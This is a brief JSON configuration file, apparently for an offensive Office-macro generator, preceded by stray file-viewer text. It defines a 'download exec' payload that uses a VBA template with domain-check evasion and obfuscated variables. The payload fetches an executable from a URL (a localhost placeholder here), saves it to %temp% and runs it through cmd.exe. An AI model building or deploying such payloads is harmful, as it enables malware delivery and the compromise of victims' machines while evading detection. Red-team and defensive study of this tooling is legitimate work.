14 lines
415 B
JSON
14 lines
415 B
JSON
{
|
|
"description": "Generic download exec payload including domain check",
|
|
"comment": "File is saved at the following path %temp%\\PATH.",
|
|
"template": "templates/generic-downloader-domain-evasion.vba",
|
|
"varcount": 80,
|
|
"encodingoffset": 4,
|
|
"encodedvars": {
|
|
"DOMAIN": "RINGZER0",
|
|
"URL": "http://127.0.0.1/malicious.exe",
|
|
"PATH": "malicious.exe"
|
|
},
|
|
"payload": "cmd.exe /c "
|
|
}
|